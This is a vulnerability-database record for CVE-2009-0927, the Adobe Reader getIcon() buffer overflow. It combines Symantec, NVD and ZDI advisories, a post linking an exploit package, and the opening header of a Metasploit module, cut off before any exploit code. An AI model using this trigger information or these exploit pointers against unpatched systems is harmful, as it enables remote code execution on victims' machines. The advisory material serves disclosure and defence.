{"published": "2009-03-18T00:00:00", "id": "SMNTC-34169", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "history": [{"differentElements": ["description", "href", "affectedSoftware"], "edition": 1, "lastseen": "2016-09-04T11:43:14", "bulletin": {"published": "2009-03-18T00:00:00", "href": "https://www.symantec.com/security_response/vulnerability.jsp?bid=34169", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "reporter": "Symantec Security Response", "history": [], "description": "### Description\n\nAdobe Acrobat and Reader are prone to a remote code-execution vulnerability because the software fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the application or crash the application, denying service to legitimate users. The issue affects the following: Reader and Acrobat 7.1 and prior Reader and Acrobat 8.1.2 and prior Reader and Acrobat 9 UPDATE (March 24, 2009): This BID was previously titled 'Adobe Acrobat and Reader Unspecified JavaScript Method Remote Code Execution Vulnerability', but has been updated to better document the issue. \n\n### Technologies Affected\n\n * Adobe Acrobat Professional 7.0.0\n * Adobe Acrobat Professional 7.0.1\n * Adobe Acrobat Professional 7.0.2\n * Adobe Acrobat Professional 7.0.3\n * Adobe Acrobat Professional 7.0.4\n * Adobe Acrobat Professional 7.0.5\n * Adobe Acrobat Professional 7.0.6\n * Adobe Acrobat Professional 7.0.7\n * Adobe Acrobat Professional 7.0.8\n * Adobe Acrobat Professional 7.0.9\n * Adobe Acrobat Professional 7.1\n * Adobe Acrobat Professional 8.0\n * Adobe Acrobat Professional 8.1\n * Adobe Acrobat Professional 8.1.1\n * Adobe Acrobat Professional 8.1.2\n * Adobe Acrobat Professional 8.1.2 Security Update 1\n * Adobe Acrobat Professional 9\n * Adobe Acrobat Standard 7.0.0\n * Adobe Acrobat Standard 7.0.1\n * Adobe Acrobat Standard 7.0.2\n * Adobe Acrobat Standard 7.0.3\n * Adobe Acrobat Standard 7.0.4\n * Adobe Acrobat Standard 7.0.5\n * Adobe Acrobat Standard 7.0.6\n * Adobe Acrobat Standard 7.0.7\n * Adobe Acrobat Standard 7.0.8\n * Adobe Acrobat Standard 7.1\n * Adobe Acrobat Standard 8.0\n * Adobe Acrobat Standard 8.1\n * Adobe Acrobat Standard 8.1.1\n * Adobe Acrobat Standard 8.1.2\n * Adobe Acrobat Standard 9\n * Adobe Reader 7.0.0\n * Adobe Reader 7.0.1\n * Adobe Reader 7.0.2\n * Adobe Reader 7.0.3\n * Adobe Reader 7.0.4\n * Adobe Reader 7.0.5\n * Adobe Reader 7.0.6\n * Adobe Reader 7.0.7\n * Adobe Reader 7.0.8\n * Adobe Reader 7.0.9\n * Adobe Reader 7.1\n * Adobe Reader 8.0\n * Adobe Reader 8.1\n * Adobe Reader 8.1.1\n * Adobe Reader 8.1.2\n * Adobe Reader 8.1.2 Security Update 1\n * Adobe Reader 9\n * Gentoo Linux\n * Nortel Networks Self-Service - CCSS7\n * Nortel Networks Self-Service MPS 1000\n * Nortel Networks Self-Service Peri Application\n * Nortel Networks Self-Service Peri Workstation\n * SuSE Linux Desktop 10\n * SuSE Novell Linux Desktop 9.0.0\n * SuSE Suse Linux Enterprise Desktop 10 SP2\n * SuSE Suse Linux Enterprise Desktop 11\n * SuSE openSUSE 10.3\n * SuSE openSUSE 11.0\n * SuSE openSUSE 11.1\n * Sun Solaris 10 Sparc\n\n### Recommendations\n\n#### Run all software as a nonprivileged user with minimal access rights.\n\nTo reduce the impact of latent vulnerabilities, run the application with the minimal amount of privileges required for functionality.\n\n#### Deploy network intrusion detection systems to monitor network traffic for malicious activity.\n\nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity including unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n#### Do not accept or execute files from untrusted or unknown sources.\n\nTo reduce the likelihood of successful exploits, never handle files that originate from unfamiliar or untrusted sources. \n\n#### Do not follow links provided by unknown or untrusted sources.\n\nTo reduce the likelihood of attacks, never visit sites of questionable integrity or follow links provided by unfamiliar or untrusted sources. \n\n#### Implement multiple redundant layers of security.\n\nVarious memory-protection schemes (such as nonexecutable and randomly mapped memory segments) may hinder an attacker's ability to exploit this vulnerability to execute arbitrary code. \n\nUpdates are available. Please see the references for details. \n", "bulletinFamily": "software", "viewCount": 1, "cvelist": ["CVE-2009-0927"], "affectedSoftware": [{"version": "7.1", "name": "Adobe Acrobat Professional", "operator": "eq"}, {"version": "7.0.1", "name": "Adobe Acrobat Professional", "operator": "eq"}, {"version": "7.1", "name": "Adobe Reader", "operator": "eq"}, {"version": "7.0.5", "name": "Adobe Acrobat Standard", "operator": "eq"}, {"version": "7.0.0", "name": "Adobe Reader", "operator": "eq"}, {"version": "9", "name": "Adobe Acrobat Professional", "operator": "eq"}, {"version": "8.1", "name": "Adobe Acrobat Standard", "operator": "eq"}, {"version": "7.0.9", "name": "Adobe Reader", "operator": "eq"}, {"version": "CCSS7", "name": "Nortel Networks Self-Service -", "operator": "eq"}, {"version": "10 SP2", "name": "SuSE Suse Linux Enterprise Desktop", "operator": "eq"}, {"version": "7.0.6", "name": "Adobe Acrobat Professional", "operator": "eq"}, {"version": "11.0", "name": "SuSE openSUSE", "operator": "eq"}, {"version": "Sparc", "name": "Sun Solaris 10", "operator": "eq"}, {"version": "7.0.8", "name": "Adobe Acrobat Professional", "operator": "eq"}, {"version": "7.0.7", "name": "Adobe Acrobat Professional", "operator": "eq"}, {"version": "8.0", "name": "Adobe Acrobat Standard", "operator": "eq"}, {"version": "8.1.1", "name": "Adobe Acrobat Professional", "operator": "eq"}, {"version": "7.0.3", "name": "Adobe Reader", "operator": "eq"}, {"version": "7.0.8", "name": "Adobe Acrobat Standard", "operator": "eq"}, {"version": "7.0.0", "name": "Adobe Acrobat Standard", "operator": "eq"}, {"version": "8.0", "name": "Adobe Acrobat Professional", "operator": "eq"}, {"version": "7.0.4", "name": "Adobe Reader", "operator": "eq"}, {"version": "8.1.2", "name": "Adobe Acrobat Professional", "operator": "eq"}, {"version": "8.1.2", "name": "Adobe Reader", "operator": "eq"}, {"version": "11.1", "name": "SuSE openSUSE", "operator": "eq"}, {"version": "8.1", "name": "Adobe Reader", "operator": "eq"}, {"version": "7.0.0", "name": "Adobe Acrobat Professional", "operator": "eq"}, {"version": "11", "name": "SuSE Suse Linux Enterprise Desktop", "operator": "eq"}, {"version": "7.0.7", "name": "Adobe Reader", "operator": "eq"}, {"version": "7.0.3", "name": "Adobe Acrobat Standard", "operator": "eq"}, {"version": "7.0.2", "name": "Adobe Reader", "operator": "eq"}, {"version": "7.0.4", "name": "Adobe Acrobat Professional", "operator": "eq"}, {"version": "8.1.1", "name": "Adobe Acrobat Standard", "operator": "eq"}, {"version": "8.1", "name": "Adobe Acrobat Professional", "operator": "eq"}, {"version": "7.0.7", "name": "Adobe Acrobat Standard", "operator": "eq"}, {"version": "7.0.1", "name": "Adobe Reader", "operator": "eq"}, {"version": "7.0.4", "name": "Adobe Acrobat Standard", "operator": "eq"}, {"version": "7.0.9", "name": "Adobe Acrobat Professional", "operator": "eq"}, {"version": "7.0.1", "name": "Adobe Acrobat Standard", "operator": "eq"}, {"version": "10.3", "name": "SuSE openSUSE", "operator": "eq"}, {"version": "7.0.2", "name": "Adobe Acrobat Professional", "operator": "eq"}, {"version": "1", "name": "Adobe Acrobat Professional 8.1.2 Security Update", "operator": "eq"}, {"version": "10", "name": "SuSE Linux Desktop", "operator": "eq"}, {"version": "8.1.2", "name": "Adobe Acrobat Standard", "operator": "eq"}, {"version": "9.0.0", "name": "SuSE Novell Linux Desktop", "operator": "eq"}, {"version": "7.0.6", "name": "Adobe Acrobat Standard", "operator": "eq"}, {"version": "7.0.2", "name": "Adobe Acrobat Standard", "operator": "eq"}, {"version": "1", "name": "Adobe Reader 8.1.2 Security Update", "operator": "eq"}, {"version": "9", "name": "Adobe Acrobat Standard", "operator": "eq"}, {"version": "7.0.6", "name": "Adobe Reader", "operator": "eq"}, {"version": "7.0.5", "name": "Adobe Acrobat Professional", "operator": "eq"}, {"version": "7.0.3", "name": "Adobe Acrobat Professional", "operator": "eq"}, {"version": "1000", "name": "Nortel Networks Self-Service MPS", "operator": "eq"}, {"version": "9", "name": "Adobe Reader", "operator": "eq"}, {"version": "any", "name": "Gentoo Linux", "operator": "eq"}, {"version": "8.1.1", "name": "Adobe Reader", "operator": "eq"}, {"version": "7.0.5", "name": "Adobe Reader", "operator": "eq"}, {"version": "8.0", "name": "Adobe Reader", "operator": "eq"}, {"version": "7.0.8", "name": "Adobe Reader", "operator": "eq"}, {"version": "7.1", "name": "Adobe Acrobat Standard", "operator": "eq"}], "type": "symantec", "hash": "c6973f233dfd1401ba7805701ad7cfbc7689d081624fd54f0a1dd133d7186cf8", "references": ["http://www.coromputer.net/CVE-2009-0927_package.zip"], "enchantments": {"score": {"value": 10.0, "modified": "2016-09-04T11:43:14"}}, "title": "Adobe Acrobat and Reader Collab 'getIcon()' JavaScript Method Remote Code Execution Vulnerability", "id": "SMNTC-34169", "lastseen": "2016-09-04T11:43:14", "edition": 1, "objectVersion": "1.2", "hashmap": [{"hash": "84348fa7e293b6054b1c3d762f4700e4", "key": "modified"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "a6c164705f75cf01162b62fd39de6f2e", "key": "cvelist"}, {"hash": "a05ae36e17d3a4e9a0a36d9b219c81c2", "key": "description"}, {"hash": "75998d1222a26fa96c3d6f228e9dbb48", "key": "affectedSoftware"}, {"hash": "afccc293667e52c179a8001649dc6d5c", "key": "href"}, {"hash": "52e3bbafc627009ac13caff1200a0dbf", "key": "type"}, {"hash": "88e1b40f79975a666c718b97b2adbd3c", "key": "title"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "84348fa7e293b6054b1c3d762f4700e4", "key": "published"}, {"hash": "1a6da5daaaec2339d110619a508bc5df", "key": "references"}, {"hash": "d6218597dc7a1b025a781373296b2b63", "key": "reporter"}], "modified": "2009-03-18T00:00:00"}}], "description": "### Description\n\nAdobe Acrobat and Reader are prone to a remote code-execution vulnerability because the software fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the application or crash the application, denying service to legitimate users. The issue affects the following: Reader and Acrobat 7.1 and prior Reader and Acrobat 8.1.2 and prior Reader and Acrobat 9 UPDATE (March 24, 2009): This BID was previously titled 'Adobe Acrobat and Reader Unspecified JavaScript Method Remote Code Execution Vulnerability', but has been updated to better document the issue.\n\n### Technologies Affected\n\n * Adobe Acrobat Professional 7.0.0 \n * Adobe Acrobat Professional 7.0.1 \n * Adobe Acrobat Professional 7.0.2 \n * Adobe Acrobat Professional 7.0.3 \n * Adobe Acrobat Professional 7.0.4 \n * Adobe Acrobat Professional 7.0.5 \n * Adobe Acrobat Professional 7.0.6 \n * Adobe Acrobat Professional 7.0.7 \n * Adobe Acrobat Professional 7.0.8 \n * Adobe Acrobat Professional 7.0.9 \n * Adobe Acrobat Professional 7.1 \n * Adobe Acrobat Professional 8.0 \n * Adobe Acrobat Professional 8.1 \n * Adobe Acrobat Professional 8.1.1 \n * Adobe Acrobat Professional 8.1.2 \n * Adobe Acrobat Professional 8.1.2 Security Update 1 \n * Adobe Acrobat Professional 9 \n * Adobe Acrobat Standard 7.0.0 \n * Adobe Acrobat Standard 7.0.1 \n * Adobe Acrobat Standard 7.0.2 \n * Adobe Acrobat Standard 7.0.3 \n * Adobe Acrobat Standard 7.0.4 \n * Adobe Acrobat Standard 7.0.5 \n * Adobe Acrobat Standard 7.0.6 \n * Adobe Acrobat Standard 7.0.7 \n * Adobe Acrobat Standard 7.0.8 \n * Adobe Acrobat Standard 7.1 \n * Adobe Acrobat Standard 8.0 \n * Adobe Acrobat Standard 8.1 \n * Adobe Acrobat Standard 8.1.1 \n * Adobe Acrobat Standard 8.1.2 \n * Adobe Acrobat Standard 9 \n * Adobe Reader 7.0.0 \n * Adobe Reader 7.0.1 \n * Adobe Reader 7.0.2 \n * Adobe Reader 7.0.3 \n * Adobe Reader 7.0.4 \n * Adobe Reader 7.0.5 \n * Adobe Reader 7.0.6 \n * Adobe Reader 7.0.7 \n * Adobe Reader 7.0.8 \n * Adobe Reader 7.0.9 \n * Adobe Reader 7.1 \n * Adobe Reader 8.0 \n * Adobe Reader 8.1 \n * Adobe Reader 8.1.1 \n * Adobe Reader 8.1.2 \n * Adobe Reader 8.1.2 Security Update 1 \n * Adobe Reader 9 \n * Gentoo Linux \n * Nortel Networks Self-Service - CCSS7 \n * Nortel Networks Self-Service MPS 1000 \n * Nortel Networks Self-Service Peri Application \n * Nortel Networks Self-Service Peri Workstation \n * SuSE Linux Desktop 10 \n * SuSE Novell Linux Desktop 9.0.0 \n * SuSE Suse Linux Enterprise Desktop 10 SP2 \n * SuSE Suse Linux Enterprise Desktop 11 \n * SuSE openSUSE 10.3 \n * SuSE openSUSE 11.0 \n * SuSE openSUSE 11.1 \n * Sun Solaris 10 Sparc \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, run the application with the minimal amount of privileges required for functionality.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity including unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo reduce the likelihood of successful exploits, never handle files that originate from unfamiliar or untrusted sources. \n\n**Do not follow links provided by unknown or untrusted sources.** \nTo reduce the likelihood of attacks, never visit sites of questionable integrity or follow links provided by unfamiliar or untrusted sources. \n\n**Implement multiple redundant layers of security.** \nVarious memory-protection schemes (such as nonexecutable and randomly mapped memory segments) may hinder an attacker's ability to exploit this vulnerability to execute arbitrary code.\n\nUpdates are available. Please see the references for details.\n", "hash": "d7e98497333913c862424684138f00b0c810e5c68be0493c434c8ed071e10915", "enchantments": {"score": {"value": 9.5, "vector": "NONE", "modified": "2018-03-13T12:07:31"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-0927"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22414", "SECURITYVULNS:DOC:21522", "SECURITYVULNS:VULN:9687"]}, {"type": "canvas", "idList": ["ACROBAT_JS4"]}, {"type": "saint", "idList": ["SAINT:3FD55356C59C08B007A70159ACFB7A63", "SAINT:AFE3E3BE3BB3652683F3F01263CCE593", "SAINT:654B00AF52A01A1D29119E4E92043279"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/ADOBE_GETICON", "MSF:EXPLOIT/WINDOWS/FILEFORMAT/ADOBE_GETICON"]}, {"type": "exploitdb", "idList": ["EDB-ID:16681", "EDB-ID:9579", "EDB-ID:8595", "EDB-ID:16606"]}, {"type": "seebug", "idList": ["SSV:12196", "SSV:66863"]}, {"type": "threatpost", "idList": ["THREATPOST:1B37290C48B43298A5C4751356F68B70", "THREATPOST:F74B2BA1E612E4169F1938346DB9CC35", "THREATPOST:B24E4C9E412A2DFD6F2A4933D9F98D62", "THREATPOST:988117842525F1F414002817E6166A11", "THREATPOST:F143FEE5D0268A8FD7B954FDAD0944A7", "THREATPOST:EF67C4CADC97C245A3B46788F85E3A8A"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83139"]}, {"type": "zdi", "idList": ["ZDI-09-014"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310900321", "OPENVAS:136141256231063853", "OPENVAS:1361412562310900320", "OPENVAS:63686", "OPENVAS:63853", "OPENVAS:136141256231063686", "OPENVAS:63891", "OPENVAS:136141256231063891", "OPENVAS:64170", "OPENVAS:64169"]}, {"type": "nessus", "idList": ["SUSE_11_1_ACROREAD-090325.NASL", "SUSE_11_0_ACROREAD-090325.NASL", "SUSE_11_ACROREAD-090325.NASL", "GENTOO_GLSA-200904-17.NASL", "ADOBE_ACROBAT_91.NASL", "ADOBE_READER_91.NASL", "SUSE_ACROREAD-6121.NASL", "SUSE_ACROREAD_JA-6161.NASL", "SUSE_11_ACROREAD_JA-090415.NASL", "SUSE_ACROREAD-6120.NASL"]}, {"type": "gentoo", "idList": ["GLSA-200904-17"]}, {"type": "suse", "idList": ["SUSE-SA:2009:014"]}], "modified": "2018-03-13T12:07:31"}, "vulnersScore": 9.5}, "type": "symantec", "lastseen": "2018-03-13T12:07:31", "edition": 2, "title": "Adobe Acrobat and Reader Collab 'getIcon()' JavaScript Method Remote Code Execution Vulnerability", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/34169", "modified": "2009-03-18T00:00:00", "bulletinFamily": "software", "viewCount": 6, "cvelist": ["CVE-2009-0927"], "affectedSoftware": [{"version": "9.0.0 ", "name": "SuSE Novell Linux Desktop", "operator": "eq"}, {"version": "7.0.6 ", "name": "Adobe Reader", "operator": "eq"}, {"version": "7.0.7 ", "name": "Adobe Reader", "operator": "eq"}, {"version": "8.1.2 ", "name": "Adobe Reader", "operator": "eq"}, {"version": "7.0.7 ", "name": "Adobe Acrobat Professional", "operator": "eq"}, {"version": "8.1.2 Security Update 1 ", "name": "Adobe Acrobat Professional", "operator": "eq"}, {"version": "8.1 ", "name": "Adobe Reader", "operator": "eq"}, {"version": "8.0 ", "name": "Adobe Acrobat Professional", "operator": "eq"}, {"version": "7.0.8 ", "name": "Adobe Reader", "operator": "eq"}, {"version": "1000 ", "name": "Nortel Networks Self-Service MPS", "operator": "eq"}, {"version": "7.0.3 ", "name": "Adobe Acrobat Professional", "operator": "eq"}, {"version": "11.1 ", "name": "SuSE openSUSE", "operator": "eq"}, {"version": "7.0.5 ", "name": "Adobe Acrobat Professional", "operator": "eq"}, {"version": "7.1 ", "name": "Adobe Acrobat Professional", "operator": "eq"}, {"version": "7.0.0 ", "name": "Adobe Reader", "operator": "eq"}, {"version": "7.0.0 ", "name": "Adobe Acrobat Professional", "operator": "eq"}, {"version": "7.0.3 ", "name": "Adobe Reader", "operator": "eq"}, {"version": "8.1.2 ", "name": "Adobe Acrobat Professional", "operator": "eq"}, {"version": "11 ", "name": "SuSE Suse Linux Enterprise Desktop", "operator": "eq"}, {"version": "7.0.7 ", "name": "Adobe Acrobat Standard", "operator": "eq"}, {"version": "7.0.4 ", "name": "Adobe Acrobat Professional", "operator": "eq"}, {"version": "10 Sparc ", "name": "Sun Solaris", "operator": "eq"}, {"version": "8.1.2 ", "name": "Adobe Acrobat Standard", "operator": "eq"}, {"version": "8.1.2 Security Update 1 ", "name": "Adobe Reader", "operator": "eq"}, {"version": "10.3 ", "name": "SuSE openSUSE", "operator": "eq"}, {"version": "7.0.6 ", "name": "Adobe Acrobat Professional", "operator": "eq"}, {"version": "7.0.8 ", "name": "Adobe Acrobat Professional", "operator": "eq"}, {"version": "8.1 ", "name": "Adobe Acrobat Standard", "operator": "eq"}, {"version": "8.1.1 ", "name": "Adobe Reader", "operator": "eq"}, {"version": "7.0.3 ", "name": "Adobe Acrobat Standard", "operator": "eq"}, {"version": "7.0.4 ", "name": "Adobe Reader", "operator": "eq"}, {"version": "9 ", "name": "Adobe Acrobat Standard", "operator": "eq"}, {"version": "7.0.1 ", "name": "Adobe Acrobat Standard", "operator": "eq"}, {"version": "10 SP2 ", "name": "SuSE Suse Linux Enterprise Desktop", "operator": "eq"}, {"version": "8.1.1 ", "name": "Adobe Acrobat Professional", "operator": "eq"}, {"version": "7.0.1 ", "name": "Adobe Reader", "operator": "eq"}, {"version": "7.0.8 ", "name": "Adobe Acrobat Standard", "operator": "eq"}, {"version": "7.0.1 ", "name": "Adobe Acrobat Professional", "operator": "eq"}, {"version": "7.0.9 ", "name": "Adobe Acrobat Professional", "operator": "eq"}, {"version": "7.1 ", "name": "Adobe Reader", "operator": "eq"}, {"version": "7.0.2 ", "name": "Adobe Reader", "operator": "eq"}, {"version": "7.1 ", "name": "Adobe Acrobat Standard", "operator": "eq"}, {"version": "8.0 ", "name": "Adobe Acrobat Standard", "operator": "eq"}, {"version": "7.0.6 ", "name": "Adobe Acrobat Standard", "operator": "eq"}, {"version": "9 ", "name": "Adobe Reader", "operator": "eq"}, {"version": "7.0.5 ", "name": "Adobe Reader", "operator": "eq"}, {"version": "8.1 ", "name": "Adobe Acrobat Professional", "operator": "eq"}, {"version": "8.0 ", "name": "Adobe Reader", "operator": "eq"}, {"version": "7.0.4 ", "name": "Adobe Acrobat Standard", "operator": "eq"}, {"version": "7.0.2 ", "name": "Adobe Acrobat Professional", "operator": "eq"}, {"version": "7.0.5 ", "name": "Adobe Acrobat Standard", "operator": "eq"}, {"version": "8.1.1 ", "name": "Adobe Acrobat Standard", "operator": "eq"}, {"version": "7.0.9 ", "name": "Adobe Reader", "operator": "eq"}, {"version": "10 ", "name": "SuSE Linux Desktop", "operator": "eq"}, {"version": "9 ", "name": "Adobe Acrobat Professional", "operator": "eq"}, {"version": "11.0 ", "name": "SuSE openSUSE", "operator": "eq"}, {"version": "7.0.0 ", "name": "Adobe Acrobat Standard", "operator": "eq"}, {"version": "7.0.2 ", "name": "Adobe Acrobat Standard", "operator": "eq"}], "references": ["http://www.coromputer.net/CVE-2009-0927_package.zip"], "reporter": "Symantec Security Response", "hashmap": [{"hash": "bfb23f1069aaa42a742cdcf9d3fa122f", "key": "affectedSoftware"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "a6c164705f75cf01162b62fd39de6f2e", "key": "cvelist"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "41d8c8ae59d3dcf61a7dbb3936ca5374", "key": "description"}, {"hash": "318b59259916ec7fad0eec13684a0f58", "key": "href"}, {"hash": "84348fa7e293b6054b1c3d762f4700e4", "key": "modified"}, {"hash": "84348fa7e293b6054b1c3d762f4700e4", "key": "published"}, {"hash": "1a6da5daaaec2339d110619a508bc5df", "key": "references"}, {"hash": "d6218597dc7a1b025a781373296b2b63", "key": "reporter"}, {"hash": "88e1b40f79975a666c718b97b2adbd3c", "key": "title"}, {"hash": "52e3bbafc627009ac13caff1200a0dbf", "key": "type"}], "objectVersion": "1.3"}

{"cve": [{"lastseen": "2019-05-29T18:09:57", "bulletinFamily": "NVD", "description": "Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9 before 9.1, 8 before 8.1.3 , and 7 before 7.1.1 allows remote attackers to execute arbitrary code via a crafted argument to the getIcon method of a Collab object, a different vulnerability than CVE-2009-0658.\nPer vendor advisory in the 'details' section it states:\n\n\"The Adobe Reader and Acrobat 9.1 and 7.1.1 updates resolve an input validation issue in a JavaScript method that could potentially lead to remote code execution. This issue has already been resolved in Adobe Reader 8.1.3 and Acrobat 8.1.3. (CVE-2009-0927)\"\n\nhttp://www.adobe.com/support/security/bulletins/apsb09-04.html", "modified": "2018-11-08T20:25:00", "id": "CVE-2009-0927", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0927", "published": "2009-03-19T10:30:00", "title": "CVE-2009-0927", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:31", "bulletinFamily": "software", "description": "Hi everyone,\r\n\r\nI published some work I did concerning the adobe reader Collab.getIcon&#40;&#41;\r\nbuffer overflow. You can find the package &#40;exploit/report/payload&#41; on:\r\nhttp://www.coromputer.net/CVE-2009-0927_package.zip\r\n\r\nCheers,\r\n\r\n\r\nIvan Rodriguez Almuina\r\nkralor - [HiC] &amp;&amp; [Crpt]\r\n", "modified": "2009-09-04T00:00:00", "published": "2009-09-04T00:00:00", "id": "SECURITYVULNS:DOC:22414", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22414", "title": "Adobe Acrobat and Reader Collab &#39;getIcon&#40;&#41;&#39; JavaScript Method Exploit and Report &#40;CVE-2009-0927&#41;", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:29", "bulletinFamily": "software", "description": "ZDI-09-014: Adobe Acrobat getIcon&#40;&#41; Stack Overflow Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-09-014\r\nMarch 24, 2009\r\n\r\n-- CVE ID:\r\nCVE-2009-0927\r\n\r\n-- Affected Vendors:\r\nAdobe\r\n\r\n-- Affected Products:\r\nAdobe Acrobat\r\n\r\n-- TippingPoint&#40;TM&#41; IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 6255.\r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Adobe Acrobat and Adobe Reader. User\r\ninteraction is required in that a user must visit a malicious web site\r\nor open a malicious file.\r\n\r\nThe specific flaw exists when processing malicious JavaScript contained\r\nin a PDF document. When supplying a specially crafted argument to the\r\ngetIcon&#40;&#41; method of a Collab object, proper bounds checking is not\r\nperformed resulting in a stack overflow. If successfully exploited full\r\ncontrol of the affected machine running under the credentials of the\r\ncurrently logged in user can be achieved.\r\n\r\n-- Vendor Response:\r\nAdobe has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\nhttp://www.adobe.com/support/security/bulletins/apsb09-04.html\r\n\r\n-- Disclosure Timeline:\r\n2008-07-03 - Vulnerability reported to vendor\r\n2009-03-24 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Tenable Network Security\r\n\r\n-- About the Zero Day Initiative &#40;ZDI&#41;:\r\nEstablished by TippingPoint, The Zero Day Initiative &#40;ZDI&#41; represents\r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors &#40;including competitors&#41; who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/", "modified": "2009-03-25T00:00:00", "published": "2009-03-25T00:00:00", "id": "SECURITYVULNS:DOC:21522", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21522", "title": "ZDI-09-014: Adobe Acrobat getIcon&#40;&#41; Stack Overflow Vulnerability", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:32", "bulletinFamily": "software", "description": "Vulnerability is used in-the-wild for hidden malware installations. Recomendations are to disable PDF displaying inside browser and Javascript in PDF documents.\r\nBuffer overflow in JBIG2 decoding, buffer overflow in getIcon&#40;&#41; javascript function.", "modified": "2009-09-04T00:00:00", "published": "2009-09-04T00:00:00", "id": "SECURITYVULNS:VULN:9687", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9687", "title": "Adobe Acrobat / Reader code execution", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T06:15:21", "bulletinFamily": "exploit", "description": "Adobe Collab.getIcon() Buffer Overflow. CVE-2009-0927. Local exploit for windows platform", "modified": "2010-09-25T00:00:00", "published": "2010-09-25T00:00:00", "id": "EDB-ID:16681", "href": "https://www.exploit-db.com/exploits/16681/", "type": "exploitdb", "title": "Adobe Collab.getIcon Buffer Overflow", "sourceData": "##\r\n# $Id: adobe_geticon.rb 10477 2010-09-25 11:59:02Z mc $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'zlib'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Adobe Collab.getIcon() Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a buffer overflow in Adobe Reader and Adobe Acrobat.\r\n\t\t\t\tAffected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially\r\n\t\t\t\tcrafted pdf that a contains malformed Collab.getIcon() call, an attacker may\r\n\t\t\t\tbe able to execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'MC',\r\n\t\t\t\t\t'Didier Stevens <didier.stevens[at]gmail.com>',\r\n\t\t\t\t\t'jduck'\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 10477 $',\r\n\t\t\t'References' 